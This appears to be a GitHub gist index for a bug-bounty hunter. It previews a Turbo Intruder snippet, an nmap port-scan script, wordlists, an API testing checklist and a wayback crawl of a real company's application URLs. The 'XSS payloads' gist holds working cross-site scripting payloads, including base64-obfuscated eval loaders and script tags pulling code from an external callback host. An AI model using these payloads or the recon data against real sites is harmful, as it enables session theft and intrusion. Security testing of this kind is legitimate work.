Uyavuz24’s gists

Uyavuz24 / resqmug.py

Created January 3, 2021 15:38

	def queueRequests(target, wordlists):
	engine = RequestEngine(endpoint=target.endpoint,
	concurrentConnections=5,
	requestsPerConnection=1, # if you increase this from 1, you may get false positives
	resumeSSL=False,
	timeout=10,
	pipeline=False,
	maxRetriesPerRequest=0,
	engine=Engine.THREADED,
	)

Uyavuz24 / port-scan.sh

Created December 7, 2020 17:02 — forked from priyanshus/port-scan.sh

NMAP scan for a list of subdomains

	#!/bin/bash
	#Performs port scan using nmap

	print_usage() {
	cat << _EOF_
	Utility to scan open ports. Can be used to scan ports for a domain or a list of domains specified in a file.
	Example Usage:
	-h, --help Show brief help
	-d, --domain Domain name or ip to scan
	-f, --file Spefify a file containing domains/IPs to scan

Uyavuz24 / sms.txt

Last active October 29, 2020 00:11

6 digits

This file has been truncated, but you can view the full file.

Uyavuz24 / iodirs.txt

Created October 26, 2020 23:30

This file has been truncated, but you can view the full file.

Uyavuz24 / HTTP Headers

Created October 10, 2020 17:35

headers for injection

Uyavuz24 / discovery.txt

Last active December 8, 2022 23:57

content discovery

This file has been truncated, but you can view the full file.

Uyavuz24 / XSS payloads

Last active October 11, 2020 19:02

there are also descriptions

	<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!!
	<svg/onload=alert(1)> //this is everywhere
	<img src=x onerror=alert(document.domain)> //this is also everywhere
	"><script src=https://ubey.xss.ht></script>
	javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URI's are taken as input.
	"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
	"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags

Uyavuz24 / apps.bentley.com.txt

Created August 20, 2020 09:33

wayback crawl

	Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0

	http://apps.bentley.com:80/claimsviewerims
	http://apps.bentley.com:80/claimsviewerims/default.aspx
	http://apps.bentley.com:80/srmanager
	http://apps.bentley.com:80/srmanager/AccountSRs
	http://apps.bentley.com:80/srmanager/AccountSRs/SRList
	http://apps.bentley.com:80/srmanager/Billing
	http://apps.bentley.com:80/srmanager/Billing/ProblemArea
	http://apps.bentley.com:80/srmanager/Billing/ProblemAreaContact

Uyavuz24 / API Checklist

Last active August 8, 2023 19:33

Our checklist for testing APIs

	* If worldist can't find anything on api, use hakrawler
	* every domain could have an api. add jSON extension to endpoints and see response
	* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features)
	* Some endpoints will return you UUID as a response to e-mail adress etc...
	* If there is no leak of User ID, just swap with user id of another account you created
	* Look for permissions in every endpoint
	* change lowercase to uppercase or vice versa in endpoints
	* After finding endpoints, Arjun it
	* Use all HTTP Request methods
	* Look for IDORs in HTTP headers and body

Uyavuz24 / api_wordlist.txt

Last active March 22, 2024 13:34

api wordlist

UYavuz Uyavuz24